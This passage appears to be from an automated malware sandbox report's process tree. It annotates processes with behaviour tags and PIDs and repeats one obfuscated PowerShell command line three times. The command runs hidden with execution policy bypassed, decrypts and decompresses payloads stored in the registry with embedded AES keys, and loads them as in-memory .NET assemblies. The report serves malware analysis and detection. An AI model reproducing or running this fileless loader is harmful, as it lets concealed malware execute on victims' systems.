                                                        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(2164).WaitForExit();[System.Threading.Thread]::Sleep(5000); function xFEyP($JUbKm){ $IXgJU=[System.Security.Cryptography.Aes]::Create(); $IXgJU.Mode=[System.Security.Cryptography.CipherMode]::CBC; $IXgJU.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $IXgJU.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SW3ru+/MjR9WpfHUJLJZ86KMc9JJtYKXrxj9adJvD0w='); $IXgJU.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bShGQyLVFYlLoL22UaNH/g=='); $IKtSy=$IXgJU.('rotpyrceDetaerC'[-1..-15] -join '')(); $MANst=$IKtSy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($JUbKm, 0, $JUbKm.Length); $IKtSy.Dispose(); $IXgJU.Dispose(); $MANst;}function hzLpy($JUbKm){ $nSCRw=New-Object System.IO.MemoryStream(,$JUbKm); $LwLqj=New-Object System.IO.MemoryStream; $JufCW=New-Object System.IO.Compression.GZipStream($nSCRw, [IO.Compression.CompressionMode]::Decompress); $JufCW.CopyTo($LwLqj); $JufCW.Dispose(); $nSCRw.Dispose(); $LwLqj.Dispose(); $LwLqj.ToArray();}function qbGWz($JUbKm,$TKtew){ $hOjGD=[System.Reflection.Assembly]::Load([byte[]]$JUbKm); $nykSy=$hOjGD.EntryPoint; $nykSy.Invoke($null, $TKtew);}$IXgJU1 = New-Object System.Security.Cryptography.AesManaged;$IXgJU1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IXgJU1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IXgJU1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SW3ru+/MjR9WpfHUJLJZ86KMc9JJtYKXrxj9adJvD0w=');$IXgJU1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bShGQyLVFYlLoL22UaNH/g==');$DYLOP = $IXgJU1.('rotpyrceDetaerC'[-1..-15] -join '')();$xYJPG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nikA7tS4MbL6+pcdhh40nw==');$xYJPG = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xYJPG, 0, $xYJPG.Length);$xYJPG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xYJPG);$PEZij = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fR4QSYjqVq3kCKCNB0zoT/EzmQDFXjJreLyVCFpmQaM=');$PEZij = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PEZij, 0, $PEZij.Length);$PEZij = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PEZij);$SvBfZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vm5KOH2NwZml0sQ127on5Q==');$SvBfZ = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SvBfZ, 0, $SvBfZ.Length);$SvBfZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($SvBfZ);$uWxtU = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UGWpGZkglw05m3QUhBQnOYFO/fyws7Tq9HuPtIcmFSPSV6JoA8MXIuJZyKmMngQCAkhPBhUTwcMKqu/qd0jNeM9C2aYBF1zGVHAMtM401134VOcnBfqt5m6+PrtdUXqF1M27DGeoWl0q3DtRZTRI9Ud/nFSL9f3UgKKlrCj0AGRK3Q3ERG4uw0jynpujv26bvINXrixhA82tZh9lctMwlDA6eXHPREe8vWhOvdvzObkvtgrkUCXGwls7Xkes8pD0t5mBdxDMMfMjNUpNgw6vcqoQQtoad78QTTtFP7ChahkgxjPKTAhbHjlbVshzH9l0OrIqsATZnWaKUP5JS5fYghEr3jTuLcPctPxMvW1e1GCFvwNeVk/kT54fI1M552VYVuqcAEqiedpPBXkDH6Q25WIY2GicEQfbinZO6IUVFc8=');$uWxtU = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uWxtU, 0, $uWxtU.Length);$uWxtU = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uWxtU);$DDUmW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0uPWJD7N6EM3Gyy58ZZW2g==');$DDUmW = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DDUmW, 0, $DDUmW.Length);$DDUmW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DDUmW);$wgHTz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WGOP1wSv7Yi99UHBGZCiyA==');$wgHTz = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wgHTz, 0, $wgHTz.Length);$wgHTz = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($wgHTz);$pclRc = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VyRcTnXy5unLECwX50S0CQ==');$pclRc = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($pclRc, 0, $pclRc.Length);$pclRc = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($pclRc);$NRYME = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+dEH6faSs3PNfoaqjmpgkA==');$NRYME = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NRYME, 0, $NRYME.Length);$NRYME = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NRYME);$eUTAt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DkdrrrMERB+nGH2+b/f64w==');$eUTAt = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($eUTAt, 0, $eUTAt.Length);$eUTAt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($eUTAt);$xYJPG0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xkJwjn7oMP9IPDdaDtjmcA==');$xYJPG0 = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xYJPG0, 0, $xYJPG0.Length);$xYJPG0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xYJPG0);$xYJPG1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PYP8GLKW6aUoKmf5pknXwg==');$xYJPG1 = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xYJPG1, 0, $xYJPG1.Length);$xYJPG1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xYJPG1);$xYJPG2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yDd4W4708IQJzHiRcino9Q==');$xYJPG2 = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xYJPG2, 0, $xYJPG2.Length);$xYJPG2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xYJPG2);$xYJPG3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ysYU2Lu0SKMOlUY+eSbMPA==');$xYJPG3 = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xYJPG3, 0, $xYJPG3.Length);$xYJPG3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xYJPG3);$DYLOP.Dispose();$IXgJU1.Dispose();$oppGA = [Microsoft.Win32.Registry]::$NRYME.$pclRc($xYJPG).$wgHTz($PEZij);$UcyFL=[string[]]$oppGA.Split('\');$VKQMD=hzLpy(xFEyP([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($UcyFL[1])));qbGWz $VKQMD (,[string[]] ('%*'));$ZbZue = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($UcyFL[0]);$IXgJU = New-Object System.Security.Cryptography.AesManaged;$IXgJU.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IXgJU.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IXgJU.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SW3ru+/MjR9WpfHUJLJZ86KMc9JJtYKXrxj9adJvD0w=');$IXgJU.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bShGQyLVFYlLoL22UaNH/g==');$IKtSy = $IXgJU.('rotpyrceDetaerC'[-1..-15] -join '')();$ZbZue = $IKtSy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZbZue, 0, $ZbZue.Length);$IKtSy.Dispose();$IXgJU.Dispose();$nSCRw = New-Object System.IO.MemoryStream(, $ZbZue);$LwLqj = New-Object System.IO.MemoryStream;$JufCW = New-Object System.IO.Compression.GZipStream($nSCRw, [IO.Compression.CompressionMode]::$xYJPG1);$JufCW.$eUTAt($LwLqj);$JufCW.Dispose();$nSCRw.Dispose();$LwLqj.Dispose();$ZbZue = $LwLqj.ToArray();$dSRKT = $uWxtU | IEX;$hOjGD = $dSRKT::$xYJPG2($ZbZue);$nykSy = $hOjGD.EntryPoint;$nykSy.$xYJPG0($null, (, [string[]] ($SvBfZ)))
                                                        5⤵
                                                        • Executes dropped EXE
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:4640
                                                      • C:\Windows\$sxr-powershell.exe
                                                        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(2164).WaitForExit();[System.Threading.Thread]::Sleep(5000); function xFEyP($JUbKm){ $IXgJU=[System.Security.Cryptography.Aes]::Create(); $IXgJU.Mode=[System.Security.Cryptography.CipherMode]::CBC; $IXgJU.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $IXgJU.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SW3ru+/MjR9WpfHUJLJZ86KMc9JJtYKXrxj9adJvD0w='); $IXgJU.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bShGQyLVFYlLoL22UaNH/g=='); $IKtSy=$IXgJU.('rotpyrceDetaerC'[-1..-15] -join '')(); $MANst=$IKtSy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($JUbKm, 0, $JUbKm.Length); $IKtSy.Dispose(); $IXgJU.Dispose(); $MANst;}function hzLpy($JUbKm){ $nSCRw=New-Object System.IO.MemoryStream(,$JUbKm); $LwLqj=New-Object System.IO.MemoryStream; $JufCW=New-Object System.IO.Compression.GZipStream($nSCRw, [IO.Compression.CompressionMode]::Decompress); $JufCW.CopyTo($LwLqj); $JufCW.Dispose(); $nSCRw.Dispose(); $LwLqj.Dispose(); $LwLqj.ToArray();}function qbGWz($JUbKm,$TKtew){ $hOjGD=[System.Reflection.Assembly]::Load([byte[]]$JUbKm); $nykSy=$hOjGD.EntryPoint; $nykSy.Invoke($null, $TKtew);}$IXgJU1 = New-Object System.Security.Cryptography.AesManaged;$IXgJU1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IXgJU1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IXgJU1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SW3ru+/MjR9WpfHUJLJZ86KMc9JJtYKXrxj9adJvD0w=');$IXgJU1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bShGQyLVFYlLoL22UaNH/g==');$DYLOP = $IXgJU1.('rotpyrceDetaerC'[-1..-15] -join '')();$xYJPG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nikA7tS4MbL6+pcdhh40nw==');$xYJPG = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xYJPG, 0, $xYJPG.Length);$xYJPG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xYJPG);$PEZij = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fR4QSYjqVq3kCKCNB0zoT/EzmQDFXjJreLyVCFpmQaM=');$PEZij = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PEZij, 0, $PEZij.Length);$PEZij = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PEZij);$SvBfZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vm5KOH2NwZml0sQ127on5Q==');$SvBfZ = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SvBfZ, 0, $SvBfZ.Length);$SvBfZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($SvBfZ);$uWxtU = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UGWpGZkglw05m3QUhBQnOYFO/fyws7Tq9HuPtIcmFSPSV6JoA8MXIuJZyKmMngQCAkhPBhUTwcMKqu/qd0jNeM9C2aYBF1zGVHAMtM401134VOcnBfqt5m6+PrtdUXqF1M27DGeoWl0q3DtRZTRI9Ud/nFSL9f3UgKKlrCj0AGRK3Q3ERG4uw0jynpujv26bvINXrixhA82tZh9lctMwlDA6eXHPREe8vWhOvdvzObkvtgrkUCXGwls7Xkes8pD0t5mBdxDMMfMjNUpNgw6vcqoQQtoad78QTTtFP7ChahkgxjPKTAhbHjlbVshzH9l0OrIqsATZnWaKUP5JS5fYghEr3jTuLcPctPxMvW1e1GCFvwNeVk/kT54fI1M552VYVuqcAEqiedpPBXkDH6Q25WIY2GicEQfbinZO6IUVFc8=');$uWxtU = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uWxtU, 0, $uWxtU.Length);$uWxtU = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uWxtU);$DDUmW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0uPWJD7N6EM3Gyy58ZZW2g==');$DDUmW = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DDUmW, 0, $DDUmW.Length);$DDUmW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DDUmW);$wgHTz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WGOP1wSv7Yi99UHBGZCiyA==');$wgHTz = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wgHTz, 0, $wgHTz.Length);$wgHTz = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($wgHTz);$pclRc = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VyRcTnXy5unLECwX50S0CQ==');$pclRc = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($pclRc, 0, $pclRc.Length);$pclRc = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($pclRc);$NRYME = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+dEH6faSs3PNfoaqjmpgkA==');$NRYME = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NRYME, 0, $NRYME.Length);$NRYME = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NRYME);$eUTAt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DkdrrrMERB+nGH2+b/f64w==');$eUTAt = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($eUTAt, 0, $eUTAt.Length);$eUTAt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($eUTAt);$xYJPG0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xkJwjn7oMP9IPDdaDtjmcA==');$xYJPG0 = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xYJPG0, 0, $xYJPG0.Length);$xYJPG0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xYJPG0);$xYJPG1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PYP8GLKW6aUoKmf5pknXwg==');$xYJPG1 = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xYJPG1, 0, $xYJPG1.Length);$xYJPG1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xYJPG1);$xYJPG2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yDd4W4708IQJzHiRcino9Q==');$xYJPG2 = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xYJPG2, 0, $xYJPG2.Length);$xYJPG2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xYJPG2);$xYJPG3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ysYU2Lu0SKMOlUY+eSbMPA==');$xYJPG3 = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xYJPG3, 0, $xYJPG3.Length);$xYJPG3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xYJPG3);$DYLOP.Dispose();$IXgJU1.Dispose();$oppGA = [Microsoft.Win32.Registry]::$NRYME.$pclRc($xYJPG).$wgHTz($PEZij);$UcyFL=[string[]]$oppGA.Split('\');$VKQMD=hzLpy(xFEyP([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($UcyFL[1])));qbGWz $VKQMD (,[string[]] ('%*'));$ZbZue = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($UcyFL[0]);$IXgJU = New-Object System.Security.Cryptography.AesManaged;$IXgJU.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IXgJU.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IXgJU.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SW3ru+/MjR9WpfHUJLJZ86KMc9JJtYKXrxj9adJvD0w=');$IXgJU.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bShGQyLVFYlLoL22UaNH/g==');$IKtSy = $IXgJU.('rotpyrceDetaerC'[-1..-15] -join '')();$ZbZue = $IKtSy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZbZue, 0, $ZbZue.Length);$IKtSy.Dispose();$IXgJU.Dispose();$nSCRw = New-Object System.IO.MemoryStream(, $ZbZue);$LwLqj = New-Object System.IO.MemoryStream;$JufCW = New-Object System.IO.Compression.GZipStream($nSCRw, [IO.Compression.CompressionMode]::$xYJPG1);$JufCW.$eUTAt($LwLqj);$JufCW.Dispose();$nSCRw.Dispose();$LwLqj.Dispose();$ZbZue = $LwLqj.ToArray();$dSRKT = $uWxtU | IEX;$hOjGD = $dSRKT::$xYJPG2($ZbZue);$nykSy = $hOjGD.EntryPoint;$nykSy.$xYJPG0($null, (, [string[]] ($SvBfZ)))
                                                        5⤵
                                                        • Executes dropped EXE
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:552
                                                      • C:\Windows\$sxr-powershell.exe
                                                        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(2164).WaitForExit();[System.Threading.Thread]::Sleep(5000); function xFEyP($JUbKm){ $IXgJU=[System.Security.Cryptography.Aes]::Create(); $IXgJU.Mode=[System.Security.Cryptography.CipherMode]::CBC; $IXgJU.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $IXgJU.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SW3ru+/MjR9WpfHUJLJZ86KMc9JJtYKXrxj9adJvD0w='); $IXgJU.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bShGQyLVFYlLoL22UaNH/g=='); $IKtSy=$IXgJU.('rotpyrceDetaerC'[-1..-15] -join '')(); $MANst=$IKtSy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($JUbKm, 0, $JUbKm.Length); $IKtSy.Dispose(); $IXgJU.Dispose(); $MANst;}function hzLpy($JUbKm){ $nSCRw=New-Object System.IO.MemoryStream(,$JUbKm); $LwLqj=New-Object System.IO.MemoryStream; $JufCW=New-Object System.IO.Compression.GZipStream($nSCRw, [IO.Compression.CompressionMode]::Decompress); $JufCW.CopyTo($LwLqj); $JufCW.Dispose(); $nSCRw.Dispose(); $LwLqj.Dispose(); $LwLqj.ToArray();}function qbGWz($JUbKm,$TKtew){ $hOjGD=[System.Reflection.Assembly]::Load([byte[]]$JUbKm); $nykSy=$hOjGD.EntryPoint; $nykSy.Invoke($null, $TKtew);}$IXgJU1 = New-Object System.Security.Cryptography.AesManaged;$IXgJU1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IXgJU1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IXgJU1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SW3ru+/MjR9WpfHUJLJZ86KMc9JJtYKXrxj9adJvD0w=');$IXgJU1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bShGQyLVFYlLoL22UaNH/g==');$DYLOP = $IXgJU1.('rotpyrceDetaerC'[-1..-15] -join '')();$xYJPG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nikA7tS4MbL6+pcdhh40nw==');$xYJPG = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xYJPG, 0, $xYJPG.Length);$xYJPG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xYJPG);$PEZij = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fR4QSYjqVq3kCKCNB0zoT/EzmQDFXjJreLyVCFpmQaM=');$PEZij = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PEZij, 0, $PEZij.Length);$PEZij = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PEZij);$SvBfZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vm5KOH2NwZml0sQ127on5Q==');$SvBfZ = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SvBfZ, 0, $SvBfZ.Length);$SvBfZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($SvBfZ);$uWxtU = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UGWpGZkglw05m3QUhBQnOYFO/fyws7Tq9HuPtIcmFSPSV6JoA8MXIuJZyKmMngQCAkhPBhUTwcMKqu/qd0jNeM9C2aYBF1zGVHAMtM401134VOcnBfqt5m6+PrtdUXqF1M27DGeoWl0q3DtRZTRI9Ud/nFSL9f3UgKKlrCj0AGRK3Q3ERG4uw0jynpujv26bvINXrixhA82tZh9lctMwlDA6eXHPREe8vWhOvdvzObkvtgrkUCXGwls7Xkes8pD0t5mBdxDMMfMjNUpNgw6vcqoQQtoad78QTTtFP7ChahkgxjPKTAhbHjlbVshzH9l0OrIqsATZnWaKUP5JS5fYghEr3jTuLcPctPxMvW1e1GCFvwNeVk/kT54fI1M552VYVuqcAEqiedpPBXkDH6Q25WIY2GicEQfbinZO6IUVFc8=');$uWxtU = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uWxtU, 0, $uWxtU.Length);$uWxtU = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uWxtU);$DDUmW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0uPWJD7N6EM3Gyy58ZZW2g==');$DDUmW = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DDUmW, 0, $DDUmW.Length);$DDUmW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DDUmW);$wgHTz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WGOP1wSv7Yi99UHBGZCiyA==');$wgHTz = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wgHTz, 0, $wgHTz.Length);$wgHTz = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($wgHTz);$pclRc = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VyRcTnXy5unLECwX50S0CQ==');$pclRc = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($pclRc, 0, $pclRc.Length);$pclRc = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($pclRc);$NRYME = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+dEH6faSs3PNfoaqjmpgkA==');$NRYME = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NRYME, 0, $NRYME.Length);$NRYME = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NRYME);$eUTAt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DkdrrrMERB+nGH2+b/f64w==');$eUTAt = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($eUTAt, 0, $eUTAt.Length);$eUTAt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($eUTAt);$xYJPG0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xkJwjn7oMP9IPDdaDtjmcA==');$xYJPG0 = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xYJPG0, 0, $xYJPG0.Length);$xYJPG0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xYJPG0);$xYJPG1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PYP8GLKW6aUoKmf5pknXwg==');$xYJPG1 = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xYJPG1, 0, $xYJPG1.Length);$xYJPG1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xYJPG1);$xYJPG2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yDd4W4708IQJzHiRcino9Q==');$xYJPG2 = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xYJPG2, 0, $xYJPG2.Length);$xYJPG2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xYJPG2);$xYJPG3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ysYU2Lu0SKMOlUY+eSbMPA==');$xYJPG3 = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xYJPG3, 0, $xYJPG3.Length);$xYJPG3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xYJPG3);$DYLOP.Dispose();$IXgJU1.Dispose();$oppGA = [Microsoft.Win32.Registry]::$NRYME.$pclRc($xYJPG).$wgHTz($PEZij);$UcyFL=[string[]]$oppGA.Split('\');$VKQMD=hzLpy(xFEyP([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($UcyFL[1])));qbGWz $VKQMD (,[string[]] ('%*'));$ZbZue = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($UcyFL[0]);$IXgJU = New-Object System.Security.Cryptography.AesManaged;$IXgJU.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IXgJU.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IXgJU.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SW3ru+/MjR9WpfHUJLJZ86KMc9JJtYKXrxj9adJvD0w=');$IXgJU.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bShGQyLVFYlLoL22UaNH/g==');$IKtSy = $IXgJU.('rotpyrceDetaerC'[-1..-15] -join '')();$ZbZue = $IKtSy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZbZue, 0, $ZbZue.Length);$IKtSy.Dispose();$IXgJU.Dispose();$nSCRw = New-Object System.IO.MemoryStream(, $ZbZue);$LwLqj = New-Object System.IO.MemoryStream;$JufCW = New-Object System.IO.Compression.GZipStream($nSCRw, [IO.Compression.CompressionMode]::$xYJPG1);$JufCW.$eUTAt($LwLqj);$JufCW.Dispose();$nSCRw.Dispose();$LwLqj.Dispose();$ZbZue = $LwLqj.ToArray();$dSRKT = $uWxtU | IEX;$hOjGD = $dSRKT::$xYJPG2($ZbZue);$nykSy = $hOjGD.EntryPoint;$nykSy.$xYJPG0($null, (, [string[]] ($SvBfZ)))
                                                        5⤵
                                                        • Executes dropped EXE
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:4676
                                                      • C:\Windows\$sxr-powershell.exe
